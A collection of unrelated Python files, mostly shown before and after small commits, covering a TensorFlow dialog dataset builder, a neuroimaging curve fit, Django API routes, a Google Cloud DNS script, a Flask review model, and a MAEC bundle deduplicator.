shape=[], dtype=tf.string)
elif self._load_domain_label and not has_domain_label:
raise ValueError(
'load_domain_label=True, but the dataset does not have domain label'
'according to metadata ({}).'.format(self._file_paths['metadata']))
info = tfds.core.DatasetInfo(
builder=self,
features=tfds.features.FeaturesDict(features),
# Note that while metadata seems to be the most appropriate way to store
# arbitrary info, it will not be printed when printing out the dataset
# info.
metadata=tfds.core.MetadataDict(**metadata_dict),
description=_DESCRIPTION.get(self._data_name, ''),
homepage=_HOMEPAGE.get(self._data_name, ''),
citation=_CITATION.get(self._data_name, ''))
# Instead of having a single element shard_lengths, we should really have a
# list of the number of elements in each file shard in each split.
split_infos = [
tfds.core.SplitInfo(
name=tfds.Split.VALIDATION,
shard_lengths=[self._num_examples['validation']],
num_bytes=0,
),
tfds.core.SplitInfo(
name=tfds.Split.TEST,
shard_lengths=[self._num_examples['test']],
num_bytes=0,
),
tfds.core.SplitInfo(
name=tfds.Split.TRAIN,
shard_lengths=[self._num_examples['train']],
num_bytes=0,
),
]
split_dict = tfds.core.SplitDict(
split_infos, dataset_name='__dialog_state_tracking_dataset_builder')
info.set_splits(split_dict)
return info
class _DialogStateTrackingDataset(base.BaseDataset):
"""SimDial dataset builder class."""
def __init__(self,
name: str,
split: str,
load_domain_label: bool = True,
add_dialog_turn_id: Optional[bool] = False,
shuffle_buffer_size: Optional[int] = None,
num_parallel_parser_calls: int = 64,
data_dir: Optional[str] = None,
download_data: bool = False,
is_training: Optional[bool] = None,
**kwargs: Any):
"""Create a dialog state tracking tf.data.Dataset builder.
Args:
name: the name of the dataset.
split: a dataset split, either a custom tfds.Split or one of the
tfds.Split enums [TRAIN, VALIDAITON, TEST] or their lowercase string
names.
load_domain_label: Whether to load dialog domain labels as well. Currently
only wroks for `SGDSyntheticDataset`.
add_dialog_turn_id: Whether to add a unique id for each dialog turn.
shuffle_buffer_size: the number of example to use in the shuffle buffer
for tf.data.Dataset.shuffle().
num_parallel_parser_calls: the number of parallel threads to use while
preprocessing in tf.data.Dataset.map().
data_dir: path to a directory containing the tfrecord datasets.
download_data: Whether or not to download data before loading. Currently
unsupported.
is_training: Whether or not the given `split` is the training split. Only
required when the passed split is not one of ['train', 'validation',
'test', tfds.Split.TRAIN, tfds.Split.VALIDATION, tfds.Split.TEST].
**kwargs: optional arguments passed to base.BaseDataset.__init__.
"""
# Load vocab for dialog utterances and state labels.
self.load_domain_label = load_domain_label
# Specify a unique id for a turn in a dialog.
self.add_dialog_turn_id = add_dialog_turn_id
self.vocab_utter = load_json(os.path.join(data_dir, FILENAME_TOKENIZER))
self.vocab_label = load_json(
os.path.join(data_dir, FILENAME_TOKENIZER_LABEL))
if self.load_domain_label:
self.vocab_domain_label = load_json(
os.path.join(data_dir, FILENAME_TOKENIZER_DOMAIN_LABEL))
dataset_builder = _DialogStateTrackingDatasetBuilder(
name, data_dir, load_domain_label)
super().__init__(
name=name,
dataset_builder=dataset_builder,
split=split,
is_training=is_training,
shuffle_buffer_size=shuffle_buffer_size,
num_parallel_parser_calls=num_parallel_parser_calls,
download_data=False,
**kwargs)
def _create_process_example_fn(self) -> base.PreProcessFn:
def _example_parser(example: Dict[str, tf.Tensor]) -> Dict[str, tf.Tensor]:
"""Parse features and labels from a serialized tf.train.Example."""
features_spec = _make_features_spec(self.load_domain_label)
features = tf.io.parse_single_example(example['features'], features_spec)
sys_utt = tf.io.parse_tensor(features[SYS_UTT_NAME], out_type=tf.int32)
usr_utt = tf.io.parse_tensor(features[USR_UTT_NAME], out_type=tf.int32)
sys_utt_raw = tf.io.parse_tensor(
features[SYS_UTT_RAW_NAME], out_type=tf.string)
usr_utt_raw = tf.io.parse_tensor(
features[USR_UTT_RAW_NAME], out_type=tf.string)
state_label = tf.io.parse_tensor(
features[STATE_LABEL_NAME], out_type=tf.int32)
dialog_len = features[DIAL_LEN_NAME]
# Extract maxmimum dialog and utterance lengths.
max_dialog_len = MAX_DIALOG_LEN[self.name]
max_utt_len = MAX_UTT_LEN[self.name]
# Ensure shape of parsed tensors.
sys_utt = tf.ensure_shape(sys_utt, (max_dialog_len, max_utt_len))
usr_utt = tf.ensure_shape(usr_utt, (max_dialog_len, max_utt_len))
sys_utt_raw = tf.ensure_shape(sys_utt_raw, (max_dialog_len,))
usr_utt_raw = tf.ensure_shape(usr_utt_raw, (max_dialog_len,))
state_label = tf.ensure_shape(state_label, (max_dialog_len,))
parsed_example = {
SYS_UTT_NAME: sys_utt,
USR_UTT_NAME: usr_utt,
USR_UTT_RAW_NAME: usr_utt_raw,
SYS_UTT_RAW_NAME: sys_utt_raw,
STATE_LABEL_NAME: state_label,
DIAL_LEN_NAME: dialog_len,
}
# Optionally, load domain labels.
if self.load_domain_label:
domain_label = tf.io.parse_tensor(
features[DOMAIN_LABEL_NAME], out_type=tf.int32)
domain_label = tf.ensure_shape(domain_label, (max_dialog_len,))
parsed_example[DOMAIN_LABEL_NAME] = domain_label
if self.add_dialog_turn_id:
example_id = example[self._fingerprint_key]
dialog_turn_id = tf.range(
example_id * max_dialog_len, (example_id + 1) * max_dialog_len,
dtype=tf.int32)
dialog_turn_id = tf.ensure_shape(dialog_turn_id, (max_dialog_len))
parsed_example[DIAL_TURN_ID_NAME] = dialog_turn_id
return parsed_example
return _example_parser
class SimDialDataset(_DialogStateTrackingDataset):
"""SimDial dataset builder class."""
def __init__(self, data_dir=None, **kwargs):
super().__init__(name='simdial', data_dir=data_dir, **kwargs)
class MultiWoZSynthDataset(_DialogStateTrackingDataset):
"""SimDial dataset builder class."""
def __init__(self, data_dir=None, **kwargs):
super().__init__(name='multiwoz_synth', data_dir=data_dir, **kwargs)
class SGDSynthDataset(_DialogStateTrackingDataset):
"""SimDial dataset builder class."""
def __init__(self, data_dir=None, **kwargs):
super().__init__(name='sgd_synth', data_dir=data_dir, **kwargs)
|
import numpy as N
def invertR(delta, IRF, niter=20, verbose=False):
"""
If IRF has 2 components (w0, w1) return an estimate of the inverse of
r=w1/w0, as in Liao et al. (2002). Fits a simple arctan model to the
ratio w1/w0.?
"""
R = IRF[1](delta) / IRF[0](delta)
def f(x, theta):
a, b, c = theta
_x = x[:,0]
return a * N.arctan(b * _x) + c
def grad(x, theta):
a, b, c = theta
value = N.zeros((3, x.shape[0]))
_x = x[:,0]
value[0] = N.arctan(b * _x)
value[1] = a / (1. + N.power((b * _x), 2.)) * _x
value[2] = 1.
return value.T
c = delta.max() / (N.pi/2)
n = delta.shape[0]
delta0 = (delta[n/2+2] - delta[n/2+1])/(R[n/2+2] - R[n/2+1])
if delta0 < 0:
c = (delta.max() / (N.pi/2)) * 1.2
else:
c = -(delta.max() / (N.pi/2)) * 1.2
from neuroimaging.algorithms.statistics import nlsmodel
design = R.reshape(R.shape[0], 1)
model = nlsmodel.NLSModel(Y=delta,
design=design,
f=f,
grad=grad,
theta=N.array([4., 0.5, 0]),
niter=niter)
for iteration in model:
model.next()
a, b, c = model.theta
def _deltahat(r):
return a * N.arctan(b * r) + c
def _ddeltahat(r):
return a * b / (1 + (b * r)**2)
def _deltahatinv(d):
return N.tan((d - c) / a) / b
def _ddeltahatinv(d):
return 1. / (a * b * N.cos((d - c) / a)**2)
for fn in [_deltahat, _ddeltahat, _deltahatinv, _ddeltahatinv]:
setattr(fn, 'a', a)
setattr(fn, 'b', b)
setattr(fn, 'c', c)
return model.theta, _deltahat, _ddeltahat, _deltahatinv, _ddeltahatinv
remove unused verbose parameter
import numpy as N
def invertR(delta, IRF, niter=20):
"""
If IRF has 2 components (w0, w1) return an estimate of the inverse of
r=w1/w0, as in Liao et al. (2002). Fits a simple arctan model to the
ratio w1/w0.?
"""
R = IRF[1](delta) / IRF[0](delta)
def f(x, theta):
a, b, c = theta
_x = x[:,0]
return a * N.arctan(b * _x) + c
def grad(x, theta):
a, b, c = theta
value = N.zeros((3, x.shape[0]))
_x = x[:,0]
value[0] = N.arctan(b * _x)
value[1] = a / (1. + N.power((b * _x), 2.)) * _x
value[2] = 1.
return value.T
c = delta.max() / (N.pi/2)
n = delta.shape[0]
delta0 = (delta[n/2+2] - delta[n/2+1])/(R[n/2+2] - R[n/2+1])
if delta0 < 0:
c = (delta.max() / (N.pi/2)) * 1.2
else:
c = -(delta.max() / (N.pi/2)) * 1.2
from neuroimaging.algorithms.statistics import nlsmodel
design = R.reshape(R.shape[0], 1)
model = nlsmodel.NLSModel(Y=delta,
design=design,
f=f,
grad=grad,
theta=N.array([4., 0.5, 0]),
niter=niter)
for iteration in model:
model.next()
a, b, c = model.theta
def _deltahat(r):
return a * N.arctan(b * r) + c
def _ddeltahat(r):
return a * b / (1 + (b * r)**2)
def _deltahatinv(d):
return N.tan((d - c) / a) / b
def _ddeltahatinv(d):
return 1. / (a * b * N.cos((d - c) / a)**2)
for fn in [_deltahat, _ddeltahat, _deltahatinv, _ddeltahatinv]:
setattr(fn, 'a', a)
setattr(fn, 'b', b)
setattr(fn, 'c', c)
return model.theta, _deltahat, _ddeltahat, _deltahatinv, _ddeltahatinv
|
from django.conf.urls import url
from api.nodes import views
from website import settings
urlpatterns = [
# Examples:
# url(r'^$', 'api.views.home', name='home'),
# url(r'^blog/', include('blog.urls')),
url(r'^$', views.NodeList.as_view(), name=views.NodeList.view_name),
url(r'^(?P<node_id>\w+)/$', views.NodeDetail.as_view(), name=views.NodeDetail.view_name),
url(r'^(?P<node_id>\w+)/contributors/$', views.NodeContributorsList.as_view(), name=views.NodeContributorsList.view_name),
url(r'^(?P<node_id>\w+)/contributors/(?P<user_id>\w+)/$', views.NodeContributorDetail.as_view(), name=views.NodeContributorDetail.view_name),
url(r'^(?P<node_id>\w+)/children/$', views.NodeChildrenList.as_view(), name=views.NodeChildrenList.view_name),
url(r'^(?P<node_id>\w+)/forks/$', views.NodeForksList.as_view(), name=views.NodeForksList.view_name),
url(r'^(?P<node_id>\w+)/files/$', views.NodeProvidersList.as_view(), name=views.NodeProvidersList.view_name),
url(r'^(?P<node_id>\w+)/files/providers/(?P<provider>\w+)/?$', views.NodeProviderDetail.as_view(), name=views.NodeProviderDetail.view_name),
url(r'^(?P<node_id>\w+)/files/(?P<provider>\w+)(?P<path>/(?:.*/)?)$', views.NodeFilesList.as_view(), name=views.NodeFilesList.view_name),
url(r'^(?P<node_id>\w+)/files/(?P<provider>\w+)(?P<path>/.+[^/])$', views.NodeFileDetail.as_view(), name=views.NodeFileDetail.view_name),
url(r'^(?P<node_id>\w+)/comments/$', views.NodeCommentsList.as_view(), name=views.NodeCommentsList.view_name),
url(r'^(?P<node_id>\w+)/logs/$', views.NodeLogList.as_view(), name=views.NodeLogList.view_name),
url(r'^(?P<node_id>\w+)/node_links/$', views.NodeLinksList.as_view(), name=views.NodeLinksList.view_name),
url(r'^(?P<node_id>\w+)/node_links/(?P<node_link_id>\w+)/', views.NodeLinksDetail.as_view(), name=views.NodeLinksDetail.view_name),
url(r'^(?P<node_id>\w+)/wikis/$', views.NodeWikiList.as_view(), name=views.NodeWikiList.view_name),
url(r'^(?P<node_id>\w+)/institutions/$', views.NodeInstitutionsList.as_view(), name=views.NodeInstitutionsList.view_name),
url(r'^(?P<node_id>\w+)/relationships/institutions/$', views.NodeInstitutionsRelationship.as_view(), name=views.NodeInstitutionsRelationship.view_name),
url(r'^(?P<node_id>\w+)/draft_registrations/$', views.NodeDraftRegistrationsList.as_view(), name=views.NodeDraftRegistrationsList.view_name),
url(r'^(?P<node_id>\w+)/draft_registrations/(?P<draft_id>\w+)/$', views.NodeDraftRegistrationDetail.as_view(), name=views.NodeDraftRegistrationDetail.view_name),
]
# Routes only active in local/staging environments
if settings.DEV_MODE:
urlpatterns.extend([
url(r'^(?P<node_id>\w+)/registrations/$', views.NodeRegistrationsList.as_view(), name=views.NodeRegistrationsList.view_name),
# Custom citations
url(r'^(?P<node_id>\w+)/citations/$', views.NodeAlternativeCitationsList.as_view(), name=views.NodeAlternativeCitationsList.view_name),
url(r'^(?P<node_id>\w+)/citations/(?P<citation_id>\w+)/$', views.NodeAlternativeCitationDetail.as_view(), name=views.NodeAlternativeCitationDetail.view_name),
])
Enable node registrations endpoint
from django.conf.urls import url
from api.nodes import views
from website import settings
urlpatterns = [
# Examples:
# url(r'^$', 'api.views.home', name='home'),
# url(r'^blog/', include('blog.urls')),
url(r'^$', views.NodeList.as_view(), name=views.NodeList.view_name),
url(r'^(?P<node_id>\w+)/$', views.NodeDetail.as_view(), name=views.NodeDetail.view_name),
url(r'^(?P<node_id>\w+)/contributors/$', views.NodeContributorsList.as_view(), name=views.NodeContributorsList.view_name),
url(r'^(?P<node_id>\w+)/contributors/(?P<user_id>\w+)/$', views.NodeContributorDetail.as_view(), name=views.NodeContributorDetail.view_name),
url(r'^(?P<node_id>\w+)/children/$', views.NodeChildrenList.as_view(), name=views.NodeChildrenList.view_name),
url(r'^(?P<node_id>\w+)/forks/$', views.NodeForksList.as_view(), name=views.NodeForksList.view_name),
url(r'^(?P<node_id>\w+)/files/$', views.NodeProvidersList.as_view(), name=views.NodeProvidersList.view_name),
url(r'^(?P<node_id>\w+)/files/providers/(?P<provider>\w+)/?$', views.NodeProviderDetail.as_view(), name=views.NodeProviderDetail.view_name),
url(r'^(?P<node_id>\w+)/files/(?P<provider>\w+)(?P<path>/(?:.*/)?)$', views.NodeFilesList.as_view(), name=views.NodeFilesList.view_name),
url(r'^(?P<node_id>\w+)/files/(?P<provider>\w+)(?P<path>/.+[^/])$', views.NodeFileDetail.as_view(), name=views.NodeFileDetail.view_name),
url(r'^(?P<node_id>\w+)/comments/$', views.NodeCommentsList.as_view(), name=views.NodeCommentsList.view_name),
url(r'^(?P<node_id>\w+)/logs/$', views.NodeLogList.as_view(), name=views.NodeLogList.view_name),
url(r'^(?P<node_id>\w+)/node_links/$', views.NodeLinksList.as_view(), name=views.NodeLinksList.view_name),
url(r'^(?P<node_id>\w+)/node_links/(?P<node_link_id>\w+)/', views.NodeLinksDetail.as_view(), name=views.NodeLinksDetail.view_name),
url(r'^(?P<node_id>\w+)/wikis/$', views.NodeWikiList.as_view(), name=views.NodeWikiList.view_name),
url(r'^(?P<node_id>\w+)/institutions/$', views.NodeInstitutionsList.as_view(), name=views.NodeInstitutionsList.view_name),
url(r'^(?P<node_id>\w+)/relationships/institutions/$', views.NodeInstitutionsRelationship.as_view(), name=views.NodeInstitutionsRelationship.view_name),
url(r'^(?P<node_id>\w+)/registrations/$', views.NodeRegistrationsList.as_view(), name=views.NodeRegistrationsList.view_name),
url(r'^(?P<node_id>\w+)/draft_registrations/$', views.NodeDraftRegistrationsList.as_view(), name=views.NodeDraftRegistrationsList.view_name),
url(r'^(?P<node_id>\w+)/draft_registrations/(?P<draft_id>\w+)/$', views.NodeDraftRegistrationDetail.as_view(), name=views.NodeDraftRegistrationDetail.view_name),
]
# Routes only active in local/staging environments
if settings.DEV_MODE:
urlpatterns.extend([
# Custom citations
url(r'^(?P<node_id>\w+)/citations/$', views.NodeAlternativeCitationsList.as_view(), name=views.NodeAlternativeCitationsList.view_name),
url(r'^(?P<node_id>\w+)/citations/(?P<citation_id>\w+)/$', views.NodeAlternativeCitationDetail.as_view(), name=views.NodeAlternativeCitationDetail.view_name),
])
|
"""Google Cloud Platform DNS Tool
This is an open source tool to management domains
in Google Cloud DNS using JSON files as reference
more informations please consulte the README.md
"""
import json
import time
from argparse import ArgumentParser
try:
from google.cloud import dns
except ImportError:
print('please check the requeriments.txt and README.md')
exit()
def client_conn(project_id=None):
"""Create a connection with Google DNS API
:param project_id: a project_id of Google Cloud Platform
:returns: an object connection of Google DNS
"""
client = dns.Client(project=project_id)
return client
def check_zone(name):
"""Check if the zone exists
:param name: a name of the new zone
:returns: True if the zone name exist
"""
client = client_conn()
zones = client.list_zones()
for zone in zones:
if zone.name == name:
return True
def create_zone(name, dns_name, description):
"""Create a new zone
:param name: a name of the new zone
:param dns_name: domain of this zone, don't forget final point '.'
:param description: a description about this zone or ""
:returns: a false if not created or true
"""
client = client_conn()
zone = client.zone(name=name,
dns_name=dns_name,
description=description)
zone.create()
return zone.exists()
def create_record(name, dns_name, record_name, record_type, ttl, value):
"""Create a new record with a existent zone
:param name: a name of zone
:param dns_name: domain of the zone
:param record_name: reference of the new record, for example:
'record_name'.zone-domain.extension
:param record_type: type of record on DNS, for example:
'A', 'AAAA', 'CAA', 'CNAME', 'MX', 'NAPTR',
'NS', 'PTR', 'SPF', 'SRV' & 'TXT'
:param ttl: ttl in seconds, default is 3600 seconds = 5 min (not string)
:param value: any value of record single or multiple,
for example: ["value"] or ["8.8.8.8", "8.8.4.4"]
:returns: log_records with all records about this zone
"""
client = client_conn()
zone = client.zone(name=name, dns_name=dns_name)
record_set = zone.resource_record_set(record_name, record_type, ttl, value)
changes = zone.changes()
changes.add_record_set(record_set)
try:
changes.create()
while changes.status != 'done':
time.sleep(1)
changes.reload()
records = zone.list_resource_record_sets()
log_records = [(record.name, record.record_type, record.ttl, record.rrdatas)
for record in records]
return log_records
except BaseException:
return "the record %s already exists" % record_name
if __name__ == '__main__':
parser = ArgumentParser()
parser.add_argument('-f', '--file', help="your json file", required=True)
args = parser.parse_args()
if args.file:
with open(args.file, 'r') as f:
data = json.load(f)
if check_zone(name=data['name']) is not True:
create_zone(name=data['name'],
dns_name=data['zone'],
description=data['description'])
for reg in range(len(data['records'])):
create_record(name=data['name'],
dns_name=data['zone'],
record_name=data['records'][reg]['name'],
record_type=data['records'][reg]['type'],
ttl=data['records'][reg]['ttl'],
value=data['records'][reg]['value'])
change requeriments to requirements
"""Google Cloud Platform DNS Tool
This is an open source tool to management domains
in Google Cloud DNS using JSON files as reference
more informations please consulte the README.md
"""
import json
import time
from argparse import ArgumentParser
try:
from google.cloud import dns
except ImportError:
print('please check the requiriments.txt and README.md')
exit()
def client_conn(project_id=None):
"""Create a connection with Google DNS API
:param project_id: a project_id of Google Cloud Platform
:returns: an object connection of Google DNS
"""
client = dns.Client(project=project_id)
return client
def check_zone(name):
"""Check if the zone exists
:param name: a name of the new zone
:returns: True if the zone name exist
"""
client = client_conn()
zones = client.list_zones()
for zone in zones:
if zone.name == name:
return True
def create_zone(name, dns_name, description):
"""Create a new zone
:param name: a name of the new zone
:param dns_name: domain of this zone, don't forget final point '.'
:param description: a description about this zone or ""
:returns: a false if not created or true
"""
client = client_conn()
zone = client.zone(name=name,
dns_name=dns_name,
description=description)
zone.create()
return zone.exists()
def create_record(name, dns_name, record_name, record_type, ttl, value):
"""Create a new record with a existent zone
:param name: a name of zone
:param dns_name: domain of the zone
:param record_name: reference of the new record, for example:
'record_name'.zone-domain.extension
:param record_type: type of record on DNS, for example:
'A', 'AAAA', 'CAA', 'CNAME', 'MX', 'NAPTR',
'NS', 'PTR', 'SPF', 'SRV' & 'TXT'
:param ttl: ttl in seconds, default is 3600 seconds = 5 min (not string)
:param value: any value of record single or multiple,
for example: ["value"] or ["8.8.8.8", "8.8.4.4"]
:returns: log_records with all records about this zone
"""
client = client_conn()
zone = client.zone(name=name, dns_name=dns_name)
record_set = zone.resource_record_set(record_name, record_type, ttl, value)
changes = zone.changes()
changes.add_record_set(record_set)
try:
changes.create()
while changes.status != 'done':
time.sleep(1)
changes.reload()
records = zone.list_resource_record_sets()
log_records = [(record.name, record.record_type, record.ttl, record.rrdatas)
for record in records]
return log_records
except BaseException:
return "the record %s already exists" % record_name
if __name__ == '__main__':
parser = ArgumentParser()
parser.add_argument('-f', '--file', help="your json file", required=True)
args = parser.parse_args()
if args.file:
with open(args.file, 'r') as f:
data = json.load(f)
if check_zone(name=data['name']) is not True:
create_zone(name=data['name'],
dns_name=data['zone'],
description=data['description'])
for reg in range(len(data['records'])):
create_record(name=data['name'],
dns_name=data['zone'],
record_name=data['records'][reg]['name'],
record_type=data['records'][reg]['type'],
ttl=data['records'][reg]['ttl'],
value=data['records'][reg]['value'])
|
from app import db
from flask import Response, json
from flask.ext.login import current_user
from sqlalchemy.orm import validates
from app.api.errors.errors import Error
from app.api.validators.number import NumberValidator
from app.api.models.user import User
from app.api.models.dish import Dish
import datetime
class Review(db.Model):
__tablename__ = 'review'
id = db.Column('id', db.Integer, primary_key=True)
user_id = db.Column('user_id', db.Integer)
dish_id = db.Column('dish_id', db.Integer)
content = db.Column('content', db.String(255))
rating = db.Column('rating', db.Integer)
date_created = db.Column('date_created', db.DateTime, default=datetime.datetime.now)
date_updated = db.Column('date_updated', db.DateTime, onupdate=datetime.datetime.now)
def __init__(self, content=None, rating=None, user_id=None, dish_id=None):
self.content = content
self.rating = rating
self.user_id = user_id
self.dish_id = dish_id
def __repr__(self):
return '<Review %r>' % self.name
def getExclude():
return []
@validates('user_id')
def validate_user_id(self, key, user_id):
if not NumberValidator.is_int(user_id):
raise Error(name='user_id', message='Not a valid user id')
if User.query.get(user_id) is None:
raise Error(name='user_id', message='Could not find user with user id %r' % user_id)
return user_id
@validates('dish_id')
def validate_dish_id(self, key, dish_id):
if not NumberValidator.is_int(dish_id):
raise Error(name='dish_id', message='Not a valid dish id')
if Dish.query.get(dish_id) is None:
raise Error(name='dish_id', message='Could not find dish with dish id %r' % dish_id)
return dish_id
@validates('rating')
def validate_rating(self, key, rating):
if not NumberValidator.between(1, 5, rating):
raise Error(name='rating', message='Number must be between 1 and 5')
return rating
@staticmethod
def post_single_preprocessor(data=None, **kw):
data['user_id'] = current_user.id
return data
Preprocessor review
import datetime
import flask
from flask.ext.login import current_user
from flask.ext.restless import ProcessingException
from sqlalchemy.orm import validates
from app import db
from app.api.errors.errors import Error
from app.api.validators.number import NumberValidator
from app.api.models.user import User
from app.api.models.dish import Dish
class Review(db.Model):
__tablename__ = 'review'
id = db.Column('id', db.Integer, primary_key=True)
user_id = db.Column('user_id', db.Integer)
dish_id = db.Column('dish_id', db.Integer)
content = db.Column('content', db.String(255))
rating = db.Column('rating', db.Integer)
date_created = db.Column('date_created', db.DateTime, default=datetime.datetime.now)
date_updated = db.Column('date_updated', db.DateTime, onupdate=datetime.datetime.now)
def __init__(self, content=None, rating=None, user_id=None, dish_id=None):
self.content = content
self.rating = rating
self.user_id = user_id
self.dish_id = dish_id
def __repr__(self):
return '<Review %r>' % self.name
def getExclude():
return []
@validates('user_id')
def validate_user_id(self, key, user_id):
if not NumberValidator.is_int(user_id):
raise Error(name='user_id', message='Not a valid user id')
if User.query.get(user_id) is None:
raise Error(name='user_id', message='Could not find user with user id %r' % user_id)
return user_id
@validates('dish_id')
def validate_dish_id(self, key, dish_id):
if not NumberValidator.is_int(dish_id):
raise Error(name='dish_id', message='Not a valid dish id')
if Dish.query.get(dish_id) is None:
raise Error(name='dish_id', message='Could not find dish with dish id %r' % dish_id)
return dish_id
@validates('rating')
def validate_rating(self, key, rating):
if not NumberValidator.between(1, 5, rating):
raise Error(name='rating', message='Number must be between 1 and 5')
return rating
@validates('content')
def validate_content(self, key, content):
if len(content) < 10:
raise Error(name='content', message='Review must be longer than or equal to 10 characters')
return content
@staticmethod
def post_single_preprocessor(data=None, **kw):
getReview = Review.query.filter(Review.user_id == current_user.id, Review.dish_id == data['dish_id']).first()
if getReview is not None:
raise ProcessingException(
description='A review was already found for this user and dish: Review with ID %r' % getReview.id,
code=400
)
data['user_id'] = current_user.id
return data
|
# MAEC Bundle Deduplicator Module
# Last updated: 12/3/2013
import collections
import cybox
import sets
import copy
from cybox.common.properties import BaseProperty
class BundleDeduplicator(object):
@classmethod
def deduplicate(cls, bundle):
# Dictionary of all unique objects
# Key = object type (xsi:type)
# Value = dictionary of unique objects for that type
# Key = unique object id
# Value = object values, as a set
cls.objects_dict = {}
# Dictionary of non-unique -> unique Object ID mappings
cls.object_ids_mapping = {}
# Get all Objects in the Bundle
all_objects = bundle.get_all_objects(include_actions=True)
# Perform the Object mapping
cls.map_objects(all_objects)
# Do the actual deduplication if duplicate objects were found
if cls.object_ids_mapping:
# Next, add the unique objects to their own collection
cls.handle_unique_objects(bundle, all_objects)
# Replace the non-unique Objects with references
# to unique Objects across the entire Bundle
cls.handle_duplicate_objects(bundle, all_objects)
# Finally, perform some cleanup to handle strange
# cases where you may have Objects pointing to each other
cls.cleanup(bundle)
# Cleanup and remove and Objects that may be referencing the re-used Objects
# Otherwise, this can create Object->Object->Object etc. references which don't make sense
@classmethod
def cleanup(cls, bundle):
# Cleanup the root-level Objects
if bundle.objects:
# List of Objects to remove
objs = [x for x in bundle.objects if (x.idref and x.idref in cls.object_ids_mapping.values())]
# Remove the extraneous Objects
for obj in objs:
bundle.objects.remove(obj)
# Cleanup the Object Collections
if bundle.collections and bundle.collections.object_collections:
for collection in bundle.collections.object_collections:
# Ignore the re-used objects collection
if collection.name and collection.name == "Deduplicated Objects":
continue
# List of Objects to remove
objs = [x for x in collection.object_list if (x.idref and x.idref in cls.object_ids_mapping.values())]
for obj in objs:
collection.object_list.remove(obj)
# Replace all of the duplicate Objects with references to
# the unique object placed in the "Re-used Objects" Collection
@classmethod
def handle_duplicate_objects(cls, bundle, all_objects):
for duplicate_object_id, unique_object_id in cls.object_ids_mapping.items():
for object in all_objects:
if object.id_ == duplicate_object_id or object.idref == duplicate_object_id:
# Modify the existing Object to serve as a reference to
# the unique Object in the collection
object.idref = unique_object_id
object.id_ = None
object.properties = None
object.related_objects = None
object.domain_specific_object_properties = None
# Add a new Object collection to the Bundle for storing the unique Objects
# Add the Objects to said collection
@classmethod
def handle_unique_objects(cls, bundle, all_objects):
# First, find the ID of the last Object Collection (if applicable)
counter = 1
if bundle.collections and bundle.collections.object_collections:
for object_collection in bundle.collections.object_collections:
counter += 1
# Find the namespace used in the Bundle IDs
bundle_namespace = bundle.id.split('-')[1]
# Build the collection ID
collection_id = "maec-" + bundle_namespace + "-objc-" + str(counter)
# Add the named Object collection
bundle.add_named_object_collection("Deduplicated Objects", collection_id)
# Add the unique Objects to the collection
cls.add_unique_objects(bundle, all_objects)
# Add the unique Objects to the collection and perform the properties replacement
@classmethod
def add_unique_objects(cls, bundle, all_objects):
added_ids = []
for unique_object_id in cls.object_ids_mapping.values():
if unique_object_id not in added_ids:
for object in all_objects:
if object.id_ and object.id_ == unique_object_id:
object_copy = copy.deepcopy(object)
if isinstance(object_copy, cybox.core.AssociatedObject):
object_copy.association_type = None
elif isinstance(object_copy, cybox.core.RelatedObject):
object_copy.relationship = None
# Modify the existing Object to serve as a reference to the Object in the collection
object.idref = object.id_
object.id_ = None
object.properties = None
object.related_objects = None
object.domain_specific_object_properties = None
# Add the unique Object to the collection
bundle.add_object(object_copy, "Deduplicated Objects")
# Break out of the all_objects loop
break
added_ids.append(unique_object_id)
# Map the non-unique Objects to their unique (first observed) counterparts
@classmethod
def map_objects(cls, all_objects):
# Do the object mapping
for obj in all_objects:
matching_object_id = cls.find_matching_object(obj)
if matching_object_id:
cls.object_ids_mapping[obj.id_] = matching_object_id
# Returns the value contained in a TypedField or its nested members, if applicable
@classmethod
def get_typedfield_values(cls, val, name, values, ignoreCase = False):
# If it's a BaseProperty instance, then we're done. Return it.
if isinstance(val, BaseProperty):
if ignoreCase:
values.add(name + ":" + str(val))
else:
values.add(name + ":" + str(val).lower())
# If it's a list, then we need to iterate through each of its members
elif isinstance(val, collections.MutableSequence):
for list_item in val:
for list_item_property in list_item._get_vars():
cls.get_typedfield_values(getattr(list_item, str(list_item_property)), name + "/" + str(list_item_property), values, ignoreCase)
# If it's a cybox.Entity, then we need to iterate through its properties
elif isinstance(val, cybox.Entity):
for item_property in val._get_vars():
cls.get_typedfield_values(getattr(val, str(item_property)), name + "/" + str(item_property), values, ignoreCase)
# Get the values specified for an object's properties as a set
@classmethod
def get_object_values(cls, obj, ignoreCase = False):
values = set()
for typed_field in obj.properties._get_vars():
# Make sure the typed field is comparable
if typed_field.comparable:
val = getattr(obj.properties, str(typed_field))
if val is not None:
cls.get_typedfield_values(val, str(typed_field), values, ignoreCase)
return values
# Find a matching object, if it exists
@classmethod
def find_matching_object(cls, obj):
if obj and obj.properties:
object_values = cls.get_object_values(obj)
xsi_type = obj.properties._XSI_TYPE
if xsi_type and xsi_type in cls.objects_dict:
types_dict = cls.objects_dict[xsi_type]
# See if we already have an identical object in the dictionary
for obj_id, obj_values in types_dict.items():
if obj_values == object_values:
# If so, return its ID for use in the IDREF
return obj_id
# If not, add it to the dictionary
types_dict[obj.id_] = object_values
elif xsi_type and xsi_type not in cls.objects_dict:
types_dict = {obj.id_:object_values}
cls.objects_dict[xsi_type] = types_dict
return None
Added proper docstrings for all methods
# MAEC Bundle Deduplicator Module
# Last updated: 12/3/2013
import collections
import cybox
import sets
import copy
from cybox.common.properties import BaseProperty
class BundleDeduplicator(object):
@classmethod
def deduplicate(cls, bundle):
"""Deduplicate the input Bundle."""
# Dictionary of all unique objects
# Key = object type (xsi:type)
# Value = dictionary of unique objects for that type
# Key = unique object id
# Value = object values, as a set
cls.objects_dict = {}
# Dictionary of non-unique -> unique Object ID mappings
cls.object_ids_mapping = {}
# Get all Objects in the Bundle
all_objects = bundle.get_all_objects(include_actions=True)
# Perform the Object mapping
cls.map_objects(all_objects)
# Do the actual deduplication if duplicate objects were found
if cls.object_ids_mapping:
# Next, add the unique objects to their own collection
cls.handle_unique_objects(bundle, all_objects)
# Replace the non-unique Objects with references
# to unique Objects across the entire Bundle
cls.handle_duplicate_objects(bundle, all_objects)
# Finally, perform some cleanup to handle strange
# cases where you may have Objects pointing to each other
cls.cleanup(bundle)
@classmethod
def cleanup(cls, bundle):
"""Cleanup and remove and Objects that may be referencing the re-used Objects.
Otherwise, this can create Object->Object->Object etc. references which don't make sense."""
# Cleanup the root-level Objects
if bundle.objects:
# List of Objects to remove
objs = [x for x in bundle.objects if (x.idref and x.idref in cls.object_ids_mapping.values())]
# Remove the extraneous Objects
for obj in objs:
bundle.objects.remove(obj)
# Cleanup the Object Collections
if bundle.collections and bundle.collections.object_collections:
